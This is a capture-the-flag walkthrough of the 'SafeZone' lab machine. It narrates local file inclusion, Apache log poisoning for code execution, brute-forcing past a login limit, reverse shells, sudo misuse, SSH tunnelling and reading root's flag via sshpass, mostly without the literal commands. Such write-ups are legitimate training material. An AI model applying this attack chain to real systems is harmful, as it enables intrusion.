SafeZone
LFI - Apache Log Poisoning - Lateral Move via find - Lateral move via SSH Local Port Forwarding - SSHPass Root flag read
Scanning
Starting off with a Rustscan
The two open ports were 22 SSH and 80 HTTP
Enumeration
Starting off with some HTTP enumeration, Because port 80 had a web server running, I scanned it for any directories and files with GoBuster
With the GoBuster scan result there was a “index.php” site as well. When I went there, I got to a login form
I played around with the login form trying some default credentials - But I quickly got a message, that I had three login attempts in total - After three attempts I had to wait for 60 seconds
So I created a test account with “register.php” to get in and clicked through the tabs on the top Under “news.php” I found a hint for LFI
And when I got to the “Details” tab, I could find out, who I am - But it looked like I had no access to this feature
On the same site I found an interesting comment way down at the bottom
So I was definitely dealing with LFI right here. From the GoBuster scan result I went to the “note.txt” file to check it out and found this message
Message from admin: I can’t remember my password always , that’s why I have saved it in /home/files/pass.txt file
Here I struggled quite a while, because I tried to access this “pass.txt” file via LFI and the GET parameter I got in the source code
But while searching online I found some Apache home directory locations right here. And that’s it! The file was located at safezone.thm/~files/pass.txt
In here I got the definitive username and the password. But there had to be two numbers in between. Because that was the only hint, I had to try all the different numeric combinations. But I still had in mind, that I only had three login attempts. So I set up the numeric combinations with Python and saved it to a file
I manually edited the one digit numbers at the beginning to fit the scheme (from 0 to 00 and 1 to 01). With that prepared I ran it with wfuzz
After a really long time I finally got the password and logged in as admin. Now I was able to access the feature on the “detail.php” page, as there was a textfield and a button.
I added the “?page=” parameter and tried some basic LFI paths. By directly entering the location of “/etc/passwd” I got the file content. Here the displayed text was black so I had to select everything to see it
Initial Compromise
Now with this LFI vulnerability I needed some kind of logs to get RCE. To search through this, I used some default locations and Burp. I got a hit with “/var/log/apache2/access.log”. In my first run the log file was way too large and I had to restart the machine
After a quick restart I now was able to access the log
Here I started with log poisoning and inserted with the intercepted Burp request this PHP line into the user-agent
Additionally I added the GET parameter to the location
And with this I got my command output. Great! I immediately went ahead, set up my Python3 server and uploaded a PHP reverse shell from pentestmonkey
Lateral Move ( www => files )
By checking some basic privilege escalation vectors I got this output with the sudo -l command
With GTFOBins I got the command to elevate my privileges to the “files” user
Lateral Move (files => yash)
I checked the sudo -l command again and got another command
But I wasn’t able to execute it right now. In the home directory of the user “files” I saw the “pass.txt” file and another one with a fancy name
In the file with the long filename I got a password hash of the “files” user. I cracked it with John
With this I obtained the password and logged in via SSH. Then I was able to execute the sudo command
It just showed the ID of the user I provided. Because there was no entry on GTFOBins and no further use, I left the binary alone
Port Tunneling
I checked some more commands. With this one, I got a service on port 8000
I used SSH tunneling to open the port on my local machine
On my specified port 8002 I got to the web server but immediately got to a 403 page
When I ran GoBuster on that port, I got one interesting result
Here I found a basic login form
Here I inspected the source code and there was a file called “login.js”
In here the credentials for the login got checkedin plain text and I just read them out
Reverse Shell
With those credentials I got in and got to the “pentest.php” site
No id or whoami, so some commands were blocked
Then I inserted the following command to make the file world accessible
It totally worked and I could edit the file as the “files” user, even though it was owned by “yash”
That way I was able to insert a reverse shell to the file, without dealing with the command blacklist on the webserver. So I created the file and gave it the permissions as I did before. Then I entered the reverse shell and saved it
I set up my netcat listener and executed the reverse shell by entering the full path in the form field
Privilege Escalation => Root
Now as the user “yash” I got another output for the sudo -l command
I tested the full command by simply executing it
I played around with it and when I just hit enter, I got the help message from “sshpass”
So I executed the command once again and wanted to transfer the “root.txt” file to the home directory of “yash”. I entered a random password and here any input should work
And after all this I finally got the root flag in the directory I entered and was able to read the content of it
Last updated
